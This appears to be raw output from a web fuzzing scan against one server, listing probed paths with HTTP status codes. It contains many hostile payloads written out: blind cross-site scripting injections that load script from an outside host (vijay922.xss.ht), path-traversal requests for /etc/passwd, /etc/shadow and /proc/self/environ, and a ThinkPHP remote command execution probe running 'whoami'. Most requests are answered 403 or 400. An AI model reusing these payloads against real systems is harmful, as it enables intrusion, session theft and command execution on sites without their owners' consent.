/..;/                 (Status: 400) [Size: 435]
//log/error.log       (Status: 403) [Size: 4514]
//logs/error.log      (Status: 403) [Size: 4514]
/%2e%2e//google.com   (Status: 400) [Size: 155]
/a%5c.aspx            (Status: 400) [Size: 435]
/actuator/auditevents (Status: 503) [Size: 0]
/actuator             (Status: 503) [Size: 0]
/actuator/caches      (Status: 503) [Size: 0]
/actuator/auditLog    (Status: 503) [Size: 0]
/actuator/configprops (Status: 503) [Size: 0]
/actuator/env         (Status: 503) [Size: 0]
/actuator/dump        (Status: 503) [Size: 0]
/actuator/conditions  (Status: 503) [Size: 0]
/actuator/events      (Status: 503) [Size: 0]
/actuator/configurationMetadata (Status: 503) [Size: 0]
/actuator/features    (Status: 503) [Size: 0]
/actuator/exportRegisteredServices (Status: 503) [Size: 0]
/actuator/flyway      (Status: 503) [Size: 0]
/actuator/health      (Status: 503) [Size: 0]
/actuator/heapdump    (Status: 503) [Size: 0]
/actuator/info        (Status: 503) [Size: 0]
/actuator/jolokia     (Status: 503) [Size: 0]
/actuator/liquibase   (Status: 503) [Size: 0]
/actuator/integrationgraph (Status: 503) [Size: 0]
/actuator/healthcheck (Status: 503) [Size: 0]
/actuator/httptrace   (Status: 503) [Size: 0]
/actuator/logfile     (Status: 503) [Size: 0]
/actuator/releaseAttributes (Status: 503) [Size: 0]
/actuator/prometheus  (Status: 503) [Size: 0]
/actuator/loggers     (Status: 503) [Size: 0]
/actuator/mappings    (Status: 503) [Size: 0]
/actuator/scheduledtasks (Status: 503) [Size: 0]
/actuator/sessions    (Status: 503) [Size: 0]
/actuator/registeredServices (Status: 503) [Size: 0]
/actuator/loggingConfig (Status: 503) [Size: 0]
/actuator/resolveAttributes (Status: 503) [Size: 0]
/actuator/statistics  (Status: 503) [Size: 0]
/actuator/metrics     (Status: 503) [Size: 0]
/actuator/refresh     (Status: 503) [Size: 0]
/actuator/sso         (Status: 503) [Size: 0]
/actuator/springWebflow (Status: 503) [Size: 0]
/actuator/status      (Status: 503) [Size: 0]
/actuator/ssoSessions (Status: 503) [Size: 0]
/actuator/shutdown    (Status: 503) [Size: 0]
/actuator/trace       (Status: 503) [Size: 0]
/actuator/threaddump  (Status: 503) [Size: 0]
/actuator/beans       (Status: 503) [Size: 0]
/admin/logs/access.log (Status: 403) [Size: 4514]
/admin/logs/access_log (Status: 403) [Size: 4514]
/admin/logs/error.log (Status: 403) [Size: 4514]
/admin/logs/error_log (Status: 403) [Size: 4514]
/apache/logs/access.log (Status: 403) [Size: 4514]
/apache/logs/error.log (Status: 403) [Size: 4514]
/apache/logs/access_log (Status: 403) [Size: 4514]
/apache/logs/error_log (Status: 403) [Size: 4514]
/api-docs             (Status: 503) [Size: 0]
/bitrix/web.config    (Status: 403) [Size: 4514]
/cms/Web.config       (Status: 403) [Size: 4514]
/error                (Status: 503) [Size: 0]
/error_log.gz         (Status: 503) [Size: 0]
/error_log            (Status: 503) [Size: 0]
/error.asp            (Status: 503) [Size: 0]
/error-log            (Status: 503) [Size: 0]
/etc/hosts            (Status: 403) [Size: 4514]
/error_import         (Status: 503) [Size: 0]
/etc/passwd           (Status: 403) [Size: 4514]
/error.ctp            (Status: 503) [Size: 0]
/error-log.txt        (Status: 503) [Size: 0]
/error.ini            (Status: 503) [Size: 0]
/error.log.0          (Status: 503) [Size: 0]
/error.jsp            (Status: 503) [Size: 0]
/error.log            (Status: 503) [Size: 0]
/error.tmpl           (Status: 503) [Size: 0]
/error.tpl            (Status: 503) [Size: 0]
/error.html           (Status: 503) [Size: 0]
/error.cpp            (Status: 503) [Size: 0]
/error.txt            (Status: 503) [Size: 0]
/error404.htm         (Status: 503) [Size: 0]
/error/               (Status: 503) [Size: 0]
/error.xml            (Status: 503) [Size: 0]
/errorlog             (Status: 503) [Size: 0]
/error1.tpl           (Status: 503) [Size: 0]
/errorPages           (Status: 503) [Size: 0]
/errors.log           (Status: 503) [Size: 0]
/error_log.txt        (Status: 503) [Size: 0]
/errors.asp           (Status: 503) [Size: 0]
/errors/creation      (Status: 503) [Size: 0]
/errors.tpl           (Status: 503) [Size: 0]
/errors/local.xml     (Status: 503) [Size: 0]
/errors/              (Status: 503) [Size: 0]
/errors.txt           (Status: 503) [Size: 0]
/favicon.ico          (Status: 200) [Size: 0]
/errors               (Status: 503) [Size: 0]
/httpd/logs/access_log (Status: 403) [Size: 4514]
/httpd/logs/access.log (Status: 403) [Size: 4514]
/httpd/logs/error_log (Status: 403) [Size: 4514]
/httpd/logs/error.log (Status: 403) [Size: 4514]
/lang/web.config      (Status: 403) [Size: 4514]
/log/access_log       (Status: 403) [Size: 4514]
/log/error.log        (Status: 403) [Size: 4514]
/log/error_log        (Status: 403) [Size: 4514]
/log/access.log       (Status: 403) [Size: 4514]
/logs/access_log      (Status: 403) [Size: 4514]
/logs/error.log       (Status: 403) [Size: 4514]
/logs/error_log       (Status: 403) [Size: 4514]
/logs/access.log      (Status: 403) [Size: 4514]
/modules/web.config   (Status: 403) [Size: 4514]
/plugins/web.config   (Status: 403) [Size: 4514]
/ping                 (Status: 200) [Size: 4]
/text-base/etc/passwd (Status: 403) [Size: 4514]
/var/log/             (Status: 403) [Size: 4514]
/version.txt          (Status: 503) [Size: 0]
/version/             (Status: 503) [Size: 0]
/web.config           (Status: 403) [Size: 4514]
/web.config.bakup     (Status: 403) [Size: 4514]
/web.config::$DATA    (Status: 403) [Size: 4514]
/web.config.bak       (Status: 403) [Size: 4514]
/web.config.old       (Status: 403) [Size: 4514]
/web.config.tmp       (Status: 403) [Size: 4514]
/web.config.temp      (Status: 403) [Size: 4514]
/web.config.txt       (Status: 403) [Size: 4514]
//api-docs/swagger.json (Status: 503) [Size: 0]
//api-docs            (Status: 503) [Size: 0]
//etc/motd            (Status: 403) [Size: 4514]
//etc/mysql/my.cnf    (Status: 403) [Size: 4514]
//proc/self/environ   (Status: 403) [Size: 4514]
/url?para=//..//..//..//..//..//..//..//..//etc//passwd// (Status: 403) [Size: 4514]
//server/logs/download?logType=error&logName=../../../../../../../../etc/shadow&logSource=engine (Status: 403) [Size: 4514]
//gui/file_viewer.php?encrypt=N&target_folder=utilities&uploaded_filename=../../../../../../../etc/passwd (Status: 403) [Size: 4514]
//assets/file:%2f%2f/etc/passwd (Status: 403) [Size: 4514]
//cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd (Status: 403) [Size: 4514]
//global-protect/login.esp?server=&prot=&passwd=&inputStr=&action=&ok=ok%3dLog+In&user=36483%22%3balert(document.domain)%2f%2f811krqsdt (Status: 403) [Size: 4514]
//tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd (Status: 403) [Size: 4514]
//search?q="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//index.php?page="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//index.php?lang="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pplay/info_prenotazioni.asp?immagine="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//shared/lgflsearch.php?terms="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?list_type="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//index.php?bukva="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?categoryid="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?categoryid2="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//en/Telefon-Cam?search="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?startTime="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//search?query="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/events_ical.cfm?categoryids="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/events_ical.cfm?categoryids2="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?enddate="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?eventSearch="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?month="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?begindate="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//search/?q="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?year="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?lang="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?q="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//index.php?pn="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?view="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?p="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//products?handler="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//search?orgId="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//josso/%5C../web-console (Status: 400) [Size: 435]
//search?keyword="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//search.php?q="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?keywords="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//property/search?uid="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//servlet/com.jsbsoft.jtf.core.SG?CODE="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//index.php?id="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//videos?place="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?email="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/minicalendar_detail.cfm?list_type="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//search/?search="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//index.php?mebel_id="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//index.php?action="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//login?redirect_uri="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//index.php?produkti_po_ime="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//plugins/actu/listing_actus-front.php?id_site="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//connexion?redirect_uri="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//index.php?produkti_po_cena="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?search="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//news/class/index.php?myshownums="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//news/class/index.php?myord="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//videos?tag="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami (Status: 400) [Size: 435]
//search?field%5B%5D="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//search.html?searchScope="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?sort="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/minicalendar_print_setup.cfm?keywords="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?name="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//search/?keyword="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//videos?search="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//search/?s="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?page="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//content.php?expand="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//apps/email/index.jsp?n="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//search-results?q="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/minicalendar_print_setup.cfm?begindate="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//search?s="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/minicalendar_print_setup.cfm?enddate="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?keywords="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//search?search="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?listingtypeid="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?cat="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?yearbuilt="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?maxprice="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?listingagent="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?minprice="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?bathrooms="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/minicalendar_print_setup.cfm?categoryid2="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?bedrooms="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?nwlat="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?minbuilt="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?featuredsearch="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?garages="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?siteid="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?listingtypes="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?t="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?keywordsany="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//index.php?Itemid="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?squarefeet="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?subdivision="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?price="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?featuredsearchseourl="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?geo="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?listingstatusid="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//firms/?text="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?lsid="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?view="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?selong="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//servlet/com.jsbsoft.jtf.core.SG?OBJET="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?maxbuilt="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?mls="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//plan_du_site.php?lang="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?selat="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//?lotsizeval="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?categoryid="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search?q="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//index.php?bukva="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?list_type="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/events_ical.cfm?categoryids2="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pplay/info_prenotazioni.asp?immagine="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search?query="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//index.php?page="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search.php?q="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//login?redirect_uri="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//index.php?action="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//index.php?id="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search?orgId="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?p="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?view="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//index.php?produkti_po_ime="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?search="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//index.php?pn="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//servlet/com.jsbsoft.jtf.core.SG?CODE="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//en/Telefon-Cam?search="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/minicalendar_detail.cfm?list_type="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?lang="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//index.php?produkti_po_cena="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?keywords="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//products?handler="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?s="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//index.php?lang="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?month="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?enddate="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//shared/lgflsearch.php?terms="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?q="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?startTime="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?categoryid2="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/events_ical.cfm?categoryids="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search?keyword="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?year="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?eventSearch="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//property/search?uid="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search/?q="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//connexion?redirect_uri="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?begindate="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//index.php?mebel_id="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search/?search="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//news/class/index.php?myshownums="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//plugins/actu/listing_actus-front.php?id_site="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//news/class/index.php?myord="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search.html?searchScope="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?name="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?sort="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//content.php?expand="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?email="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search/?s="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?page="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?maxbuilt="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/minicalendar_print_setup.cfm?enddate="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?featuredsearchseourl="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?maxprice="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?lsid="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//apps/email/index.jsp?n="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?listingtypeid="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//videos?search="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//videos?tag="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//videos?place="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?listingtypes="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?squarefeet="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?listingagent="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search?field%5B%5D="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?bathrooms="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?keywordsany="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/minicalendar_print_setup.cfm?begindate="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/minicalendar_print_setup.cfm?keywords="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?siteid="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?keywords="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?garages="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/minicalendar_print_setup.cfm?categoryid2="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?price="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search-results?q="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?mls="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?yearbuilt="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?featuredsearch="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//firms/?text="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?listingstatusid="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?minprice="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search?search="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search/?keyword="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//index.php?page=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?t="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search?query=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//search?s="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?minbuilt="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?subdivision="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?nwlat="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?bedrooms="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?categoryid2=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?cat="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//index.php?bukva=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//search.jsp?query="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?categoryid=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?lotsizeval="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?list_type=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//index.php?lang=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//en/Telefon-Cam?search=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//search?q=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//shared/lgflsearch.php?terms=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?geo="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?view="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?s=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//plan_du_site.php?lang="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
